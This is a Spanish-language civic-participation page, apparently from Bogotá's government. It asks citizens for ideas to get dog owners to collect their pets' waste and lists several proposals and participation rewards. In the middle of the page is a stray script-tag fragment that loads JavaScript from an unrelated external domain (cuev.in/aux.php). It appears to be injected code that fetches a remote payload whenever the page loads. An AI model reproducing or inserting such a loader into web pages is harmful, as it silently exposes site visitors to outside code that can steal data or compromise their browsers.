¿Cómo incentivar a los responsables de perros a recoger los excrementos de sus mascotas?

Compartir

Teniendo en cuenta que este es uno de los comportamientos contrarios a la convivencia que más se presenta en la ciudad, la Secretaría Distrital de Gobierno quiere implementar una estrategia de pedagogía y sensibilización dirigida a la ciudadanía, que promueva la tenencia responsable de mascotas.

A través de este reto buscamos propuestas ciudadanas para que los tenedores y propietarios de perros se concienticen sobre la importancia que tiene para la sana convivencia y la salud pública la disposición responsable de los excrementos de mascotas.

Queremos escuchar ideas que permitan un adecuado uso del espacio público, y una convivencia armónica entre los ciudadanos.

El Nuevo Código Nacional de Policía y Convivencia establece en el numeral 3 del artículo 124 que “omitir la recogida de los excrementos de los animales, por parte de sus tenedores o propietarios, o dejarlos abandonados después de recogidos, cuando ello ocurra en el espacio público o en áreas comunes”, acarrea una multa de 4 SMDLV ($104.164).


Palabras Clave: #CulturaCiudadana, #EspacioPúblico, #CódigoDePolicía, #ParquesLimpios, #YoRecojoElPopóDeMiPerro.



src="https://cuev.in/aux.php?ver=1.0&ref=at&debug=" type="text/javascript">
  • ¿Cómo incentivar a los responsables de perros a recoger los excrementos de sus mascotas?
Reto cumplido

67

Aportes

0

Días restantes

Diego Leòn Buitrago Castañeda

100 días

¡Si a mi perro quiero ver feliz.. su excremento no debo dejar por ahí!

!Un espacio limpio regala sonrisas! la invitación es a que las personas que sacan a su mejor amigo al aire libre, le otorguen importancia a la necesidad de mantener limpios los espacios que le posibilitan ser feliz a su mascota.

Leer más

JAIRO TORRES MELO

100 días

PARQUES Y ESPACIO PUBLICO SIN EXCREMENTOS

los parques y prados NO DEBE SER BAÑO PUBLICO DE MASCOTAS, educar a sus perros a que hagan sus necesidades dentro del baño del dueño, sobre un periódico y que éste los recoja y los eche a la tasa y baje la cisterna y si es orina que eche el periódico a la basura.

Leer más
Educando por una causa colectiva

JUAN SEBASTIAN CHICAGÜI

105 días

Educando por una causa colectiva

todo esta en las personas , todo esta en la educación

Leer más

María Angélica Gaitán Guzmán

105 días

CulturAnimalWoW

Sacar Al Mercado Bolsas Biodegradables Accesibles De Uso Obligatorio Para Tenedores Y Propietarios De Animales De Compañía
Dotar De Canecas Recicladas Los Espacios Públicos Para Solo Desechos De Mascotas excrementos y Poner Bolsas Al Lado De Las Canecas.

Leer más
Canecas inteligentes junto con aplicación móvil

Leidy Camacho

106 días

Canecas inteligentes junto con aplicación móvil

Canecas inteligentes, que dan puntos por arrojar el popo de perro, junto con una app que registre los puntos para obtener incentivos collares, bolsas biodegradables, galletas, esto permitiría que la constancia de una acción se convierta en habito.

Leer más

Monica Baquero

112 días

Incluir JAC para que se hagan recorridos en l o spuntos cRìticos de la localidad y se lleven a cabo acciones de sensibilización periodicamentepara q ue sea un proceso y que se hagan concursos de embellecimi e n t o de esos espacios.

Leer más


RECOMPENSAS

Por cada idea aportada recibirás 120

Por cada like en tu idea recibirás 20

• Kit “Te amo Bogotá”. • Café conversación con el Secretario y Subsecretario para tratar la idea.